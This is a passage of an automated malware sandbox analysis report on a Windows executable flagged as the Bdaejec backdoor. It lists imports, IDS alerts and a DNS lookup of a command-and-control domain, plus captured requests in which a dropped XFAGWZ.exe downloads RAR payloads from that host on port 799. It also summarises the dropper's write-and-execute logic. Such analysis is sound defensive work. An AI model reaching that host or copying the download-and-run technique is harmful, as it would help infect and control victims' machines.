                          RT_DIALOG0x4539a00x8aedataChineseChina0.39603960396039606
                          RT_DIALOG0x4542500xb2dataChineseChina0.7359550561797753
                          RT_DIALOG0x4543040xccdataChineseChina0.7647058823529411
                          RT_DIALOG0x4543d00xb2dataChineseChina0.6629213483146067
                          RT_DIALOG0x4544840xe2dataChineseChina0.6637168141592921
                          RT_DIALOG0x4545680x18cdataChineseChina0.5227272727272727
                          RT_STRING0x4546f40x50dataChineseChina0.85
                          RT_STRING0x4547440x2cdataChineseChina0.5909090909090909
                          RT_STRING0x4547700x78dataChineseChina0.925
                          RT_STRING0x4547e80x1c4dataChineseChina0.8141592920353983
                          RT_STRING0x4549ac0x12adataChineseChina0.5201342281879194
                          RT_STRING0x454ad80x146dataChineseChina0.6288343558282209
                          RT_STRING0x454c200x40dataChineseChina0.65625
                          RT_STRING0x454c600x64dataChineseChina0.73
                          RT_STRING0x454cc40x1d8dataChineseChina0.6758474576271186
                          RT_STRING0x454e9c0x114dataChineseChina0.6376811594202898
                          RT_STRING0x454fb00x24dataChineseChina0.4444444444444444
                          RT_GROUP_CURSOR0x454fd40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.25
                          RT_GROUP_CURSOR0x454fe80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.25
                          RT_GROUP_CURSOR0x454ffc0x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                          RT_GROUP_ICON0x4550200x14data1.25
                          RT_GROUP_ICON0x4550340x14dataChineseChina1.2
                          RT_GROUP_ICON0x4550480x14dataChineseChina1.25
                          RT_VERSION0x45505c0x240dataChineseChina0.5086805555555556
                          RT_MANIFEST0x45529c0x1cdXML 1.0 document, ASCII text, with very long lines (461), with no line terminators0.5878524945770065
                          DLLImport
                          KERNEL32.dllFlushFileBuffers, SetFilePointer, GetCurrentProcess, DuplicateHandle, lstrcpynA, FileTimeToLocalFileTime, FileTimeToSystemTime, LocalFree, InterlockedDecrement, SuspendThread, ReleaseMutex, CreateMutexA, TerminateThread, SetLastError, IsBadReadPtr, VirtualFree, VirtualAlloc, GetCurrentProcessId, GetEnvironmentVariableA, CreateSemaphoreA, ResumeThread, ReleaseSemaphore, EnterCriticalSection, LeaveCriticalSection, GetProfileStringA, WriteFile, InterlockedExchange, SetStdHandle, IsBadCodePtr, CompareStringW, CompareStringA, SetUnhandledExceptionFilter, GetStringTypeW, GetStringTypeA, IsBadWritePtr, LCMapStringW, LCMapStringA, SetEnvironmentVariableA, HeapCreate, HeapDestroy, GetFileType, GetStdHandle, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, GetACP, HeapSize, RaiseException, WaitForMultipleObjects, CreateFileA, SetEvent, FindResourceA, LoadResource, LockResource, SizeofResource, ReadFile, lstrlenW, GetModuleFileNameA, WideCharToMultiByte, MultiByteToWideChar, GetCurrentThreadId, ExitProcess, GlobalSize, GlobalFree, DeleteCriticalSection, InitializeCriticalSection, lstrcatA, lstrlenA, WinExec, lstrcpyA, FindNextFileA, GlobalReAlloc, HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetUserDefaultLCID, GetFullPathNameA, FreeLibrary, LoadLibraryA, GetLastError, GetVersionExA, WritePrivateProfileStringA, GetPrivateProfileStringA, CreateThread, CreateEventA, Sleep, GlobalAlloc, GlobalLock, GlobalUnlock, GetTempPathA, FindFirstFileA, FindClose, GetFileAttributesA, DeleteFileA, GetLocalTime, GetSystemTime, GetTimeZoneInformation, TerminateProcess, RtlUnwind, GetStartupInfoA, GetOEMCP, GetCPInfo, GetProcessVersion, SetErrorMode, GlobalFlags, GetCurrentThread, GetFileTime, GetFileSize, TlsGetValue, LocalReAlloc, TlsSetValue, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, lstrcmpA, GetVersion, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GetCurrentDirectoryA, SetCurrentDirectoryA, GetVolumeInformationA, GetModuleHandleA, GetProcAddress, MulDiv, GetCommandLineA, GetTickCount, GlobalDeleteAtom, lstrcmpiA, SetEndOfFile, UnlockFile, LockFile, WaitForSingleObject, CloseHandle, InterlockedIncrement
                          USER32.dllGetScrollPos, wsprintfA, CloseClipboard, GetClipboardData, OpenClipboard, SetClipboardData, EmptyClipboard, GetSystemMetrics, GetCursorPos, MessageBoxA, SetWindowPos, SendMessageA, DestroyCursor, SetParent, IsWindow, PostMessageA, GetTopWindow, GetParent, GetFocus, GetClientRect, InvalidateRect, ValidateRect, UpdateWindow, EqualRect, GetWindowRect, SetForegroundWindow, DestroyMenu, IsChild, ReleaseDC, IsRectEmpty, FillRect, GetDC, SetCursor, LoadCursorA, SetCursorPos, SetActiveWindow, GetSysColor, SetWindowLongA, GetWindowLongA, RedrawWindow, EnableWindow, IsWindowVisible, OffsetRect, PtInRect, DestroyIcon, IntersectRect, InflateRect, SetRect, SetScrollPos, SetScrollRange, GetScrollRange, SetCapture, GetCapture, ReleaseCapture, SetTimer, KillTimer, WinHelpA, LoadBitmapA, LoadIconA, TranslateMessage, DrawFrameControl, DrawEdge, DrawFocusRect, WindowFromPoint, GetMessageA, DispatchMessageA, SetRectEmpty, RegisterClipboardFormatA, CreateIconFromResourceEx, CreateIconFromResource, DrawIconEx, CreatePopupMenu, AppendMenuA, ModifyMenuA, CreateMenu, CreateAcceleratorTableA, GetDlgCtrlID, GetSubMenu, EnableMenuItem, ClientToScreen, EnumDisplaySettingsA, LoadImageA, SystemParametersInfoA, ShowWindow, IsWindowEnabled, TranslateAcceleratorA, GetKeyState, CopyAcceleratorTableA, PostQuitMessage, IsZoomed, GetClassInfoA, DefWindowProcA, GetSystemMenu, DeleteMenu, GetMenu, GetWindowTextA, GetWindowTextLengthA, CharUpperA, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, DrawTextA, GrayStringA, GetDlgItem, DestroyWindow, CreateDialogIndirectParamA, EndDialog, GetNextDlgTabItem, GetWindowPlacement, RegisterWindowMessageA, GetForegroundWindow, GetLastActivePopup, GetMessageTime, RemovePropA, CallWindowProcA, GetPropA, UnhookWindowsHookEx, SetPropA, GetClassLongA, CallNextHookEx, SetWindowsHookExA, CreateWindowExA, GetMenuItemID, GetMenuItemCount, RegisterClassA, UnregisterClassA, AdjustWindowRectEx, MapWindowPoints, SendDlgItemMessageA, ScrollWindowEx, IsDialogMessageA, SetWindowTextA, MoveWindow, CheckMenuItem, SetMenuItemBitmaps, GetMenuState, GetMenuCheckMarkDimensions, GetClassNameA, GetDesktopWindow, LoadStringA, GetSysColorBrush, SetMenu, PeekMessageA, IsIconic, SetFocus, GetActiveWindow, GetWindow, DestroyAcceleratorTable, SetWindowRgn, GetMessagePos, ScreenToClient, ChildWindowFromPointEx, CopyRect
                          GDI32.dllSelectPalette, RealizePalette, GetDIBits, GetWindowExtEx, GetViewportOrgEx, GetWindowOrgEx, BeginPath, EndPath, PathToRegion, CreateEllipticRgn, CreateRoundRectRgn, GetTextColor, GetBkMode, GetBkColor, GetROP2, GetStretchBltMode, GetPolyFillMode, CreateCompatibleBitmap, CreateDCA, CreateBitmap, SelectObject, CreatePen, PatBlt, CombineRgn, CreateRectRgn, FillRgn, CreateSolidBrush, CreateFontIndirectA, GetStockObject, GetObjectA, EndPage, EndDoc, DeleteDC, StartDocA, StretchBlt, BitBlt, CreateCompatibleDC, Ellipse, Rectangle, LPtoDP, DPtoLP, GetCurrentObject, RoundRect, GetTextExtentPoint32A, GetDeviceCaps, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetTextColor, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetClipBox, ExcludeClipRect, MoveToEx, LineTo, ExtSelectClipRgn, CreatePalette, GetSystemPaletteEntries, CreateDIBitmap, DeleteObject, SelectClipRgn, CreatePolygonRgn, GetClipRgn, SetStretchBltMode, CreateRectRgnIndirect, SetBkColor, StartPage, GetTextMetricsA, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetViewportExtEx
                          WINMM.dllmidiStreamRestart, midiStreamClose, midiOutReset, midiStreamStop, midiStreamOut, midiOutPrepareHeader, midiStreamProperty, midiStreamOpen, midiOutUnprepareHeader, waveOutOpen, waveOutGetNumDevs, waveOutClose, waveOutReset, waveOutPause, waveOutWrite, waveOutPrepareHeader, waveOutUnprepareHeader, waveOutRestart
                          WINSPOOL.DRVClosePrinter, DocumentPropertiesA, OpenPrinterA
                          ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegQueryValueA, RegSetValueExA, RegCreateKeyExA
                          SHELL32.dllShellExecuteA, Shell_NotifyIconA
                          ole32.dllCLSIDFromProgID, OleInitialize, OleUninitialize, CLSIDFromString, CoCreateInstance, OleRun
                          OLEAUT32.dllSafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetDim, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElement, VariantCopyInd, VariantInit, SysAllocString, SafeArrayDestroy, SafeArrayCreate, SafeArrayPutElement, RegisterTypeLib, LHashValOfNameSys, LoadTypeLib, UnRegisterTypeLib, VariantClear, VariantChangeType
                          COMCTL32.dllImageList_GetImageCount, ImageList_SetBkColor, ImageList_Destroy, ImageList_Read, ImageList_Duplicate
                          WS2_32.dllrecvfrom, ioctlsocket, recv, getpeername, accept, ntohl, WSAAsyncSelect, inet_ntoa, closesocket, WSACleanup
                          comdlg32.dllGetFileTitleA, GetSaveFileNameA, GetOpenFileNameA, ChooseColorA
                          NameOrdinalAddress
                          e2ee_CacheClear10x476b40
                          e2ee_CacheDecr20x476b80
                          e2ee_CacheDelete30x476b20
                          e2ee_CacheExists40x476b00
                          e2ee_CacheGet50x476a40
                          e2ee_CacheGetMulti60x476ac0
                          e2ee_CacheGetMultiText70x476ae0
                          e2ee_CacheGetText80x476a60
                          e2ee_CacheIncr90x476b60
                          e2ee_CacheSet100x476a80
                          e2ee_CacheSetExpire110x476ba0
                          e2ee_CacheSetText120x476aa0
                          Language of compilation systemCountry where language is spokenMap
                          ChineseChina
                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-24T23:49:20.932540+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974120.12.23.50192.168.2.4
                          2024-07-24T23:49:03.660681+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49730799192.168.2.444.221.84.105
                          2024-07-24T23:49:08.723751+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49731799192.168.2.444.221.84.105
                          2024-07-24T23:49:23.114028+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49743443192.168.2.413.89.179.12
                          2024-07-24T23:49:58.296193+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974420.12.23.50192.168.2.4
                          2024-07-24T23:49:02.882461+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5544153192.168.2.41.1.1.1
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 24, 2024 23:49:03.241332054 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:03.249254942 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:03.249592066 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:03.250174999 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:03.257889032 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:03.659729958 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:03.660010099 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:03.660681009 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:03.660681009 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:03.676515102 CEST49730799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:03.690068007 CEST7994973044.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:08.293709040 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:08.298846006 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:08.298970938 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:08.299634933 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:08.304548979 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:08.723659039 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:08.723685026 CEST7994973144.221.84.105192.168.2.4
                          Jul 24, 2024 23:49:08.723751068 CEST49731799192.168.2.444.221.84.105
                          Jul 24, 2024 23:49:23.682876110 CEST49731799192.168.2.444.221.84.105
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 24, 2024 23:49:02.882461071 CEST5544153192.168.2.41.1.1.1
                          Jul 24, 2024 23:49:03.235528946 CEST53554411.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 24, 2024 23:49:02.882461071 CEST192.168.2.41.1.1.10x1962Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 24, 2024 23:49:03.235528946 CEST1.1.1.1192.168.2.40x1962No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                          • ddos.dnsnb8.net:799
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44973044.221.84.1057995356C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 24, 2024 23:49:03.250174999 CEST288OUTGET /cj//k1.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.44973144.221.84.1057995356C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 24, 2024 23:49:08.299634933 CEST288OUTGET /cj//k2.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:17:49:01
                          Start date:24/07/2024
                          Path:C:\Users\user\Desktop\8VB4lVuZk3.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\8VB4lVuZk3.exe"
                          Imagebase:0x400000
                          File size:4'354'058 bytes
                          MD5 hash:51309D30F3FB3295FEA0B6D3084C4D26
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:1
                          Start time:17:49:02
                          Start date:24/07/2024
                          Path:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                          Imagebase:0x6b0000
                          File size:15'872 bytes
                          MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:moderate
                          Has exited:true

                          Target ID:4
                          Start time:17:49:08
                          Start date:24/07/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1224
                          Imagebase:0x8d0000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:0.1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:87.5%
                            Total number of Nodes:8
                            Total number of Limit Nodes:1
                            execution_graph 27048 856000 27050 856044 GetPEB 27048->27050 27051 856077 CreateFileA 27050->27051 27053 856265 27051->27053 27054 85622d 27051->27054 27055 856246 WriteFile 27054->27055 27056 856244 27054->27056 27057 856255 FindCloseChangeNotification WinExec 27055->27057 27056->27057 27057->27053

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 856044-856074 GetPEB 1 856077-85609a 0->1 2 85609d-8560a0 1->2 3 8560a6-8560bc 2->3 4 8561ee-85622b CreateFileA 2->4 5 856110-856116 3->5 6 8560be-8560c5 3->6 21 856265-856269 4->21 22 85622d-856230 4->22 7 856129-85612f 5->7 8 856118-85611f 5->8 6->5 9 8560c7-8560ce 6->9 12 856131-856138 7->12 13 856148-85614e 7->13 8->7 11 856121-856124 8->11 9->5 14 8560d0-8560d7 9->14 16 8561bb-8561c0 11->16 12->13 17 85613a-856141 12->17 18 856167-85616f 13->18 19 856150-856157 13->19 14->5 20 8560d9-8560dd 14->20 24 8561e0-8561e9 16->24 25 8561c2-8561c5 16->25 17->13 23 856143-856146 17->23 27 856171-856178 18->27 28 856188-85618e 18->28 19->18 26 856159-856160 19->26 20->5 29 8560df-8560e3 20->29 30 856232-856238 22->30 23->16 24->2 25->24 31 8561c7-8561ca 25->31 26->18 32 856162-856165 26->32 27->28 33 85617a-856181 27->33 35 8561a7-8561ad 28->35 36 856190-856197 28->36 29->16 34 8560e9-85610b 29->34 39 856246-856252 WriteFile 30->39 40 85623a-856242 30->40 31->24 41 8561cc-8561cf 31->41 32->16 33->28 42 856183-856186 33->42 34->1 35->16 38 8561af-8561b6 35->38 36->35 37 856199-8561a0 36->37 37->35 43 8561a2-8561a5 37->43 38->16 44 8561b8 38->44 46 856255-856262 FindCloseChangeNotification WinExec 39->46 40->30 45 856244 40->45 41->24 47 8561d1-8561d4 41->47 42->16 43->16 44->16 45->46 46->21 47->24 49 8561d6-8561d9 47->49 49->24 50 8561db-8561de 49->50 50->4 50->24
                            APIs
                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00856223
                            • WriteFile.KERNELBASE(00000000,FFC489DC,00003E00,?,00000000), ref: 00856252
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00856256
                            • WinExec.KERNEL32(?,00000005), ref: 00856262
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2942537816.0000000000856000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2941723444.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2941755897.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2941872404.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2941872404.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2941952785.00000000004E7000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2941986789.00000000004E9000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942019246.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942095341.000000000053A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942123386.000000000053D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942123386.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942123386.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942123386.000000000056B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942123386.0000000000571000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942304860.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2942565440.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                            • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XFAGWZ.exe$athA$catA$dleA$el32$lstr$odul
                            • API String ID: 2234911746-3738084585
                            • Opcode ID: 61e831d16214447f6678b16393c57fc794cbf310ac324a724d67e3123be6d0c6
                            • Instruction ID: cc13e2f2223feac0f81d4c91107f5ec16739f9be00fcb9e0733b64e44cb0ea41
                            • Opcode Fuzzy Hash: 61e831d16214447f6678b16393c57fc794cbf310ac324a724d67e3123be6d0c6
                            • Instruction Fuzzy Hash: AE613A74D41619DBCF24CF94C984ABDBBB4FF44316FA481AAD805AB202E7309E95CB91
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Heap_free$FreeProcess
                            • String ID:
                            • API String ID: 1072109031-0
                            • Opcode ID: 959cfa7cacaaaa37a6605f2ed99b6fe915078aa76a186cc34bced5153c3a745d
                            • Instruction ID: c91ca10c04767193e89d5637acc60afcfbc29ab0cc937b4d7828fba5d9bc5889
                            • Opcode Fuzzy Hash: 959cfa7cacaaaa37a6605f2ed99b6fe915078aa76a186cc34bced5153c3a745d
                            • Instruction Fuzzy Hash: A3114532605A209FE7209A6CCC41B47B3F5BF44A14F289828E5AAC6AA0D765F885CB50
                            APIs
                            • CoCreateInstance.OLE32(6CEDC72C,00000000,00000017,6CEDC2D8,D2AB1C0E,6CE8D2F0,6CE8D2F0,D2AB1C0E,6C89C364,?,?,?,00000000), ref: 6C8A6644
                            • OleRun.OLE32(?), ref: 6C8A6654
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: ae3186748fb5eac9254c619fa4e01bbe61121eeeea050c04f1274c3d75769cf5
                            • Instruction ID: 412a60096d085b2932297ed191d770774e4b90b06e0498c65deb6d84e1472612
                            • Opcode Fuzzy Hash: ae3186748fb5eac9254c619fa4e01bbe61121eeeea050c04f1274c3d75769cf5
                            • Instruction Fuzzy Hash: 7701AD32601512AFC3208B68C848F0AFBF8AF98B90F254558F809DB230DB30DC428B90
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6CC01339,6CD71820,00000001,?,6CC01450,6CD71820,00000017), ref: 6CC131FA
                            • UnhandledExceptionFilter.KERNEL32(6CD71820,?,6CC01339,6CD71820,00000001,?,6CC01450,6CD71820,00000017), ref: 6CC13203
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
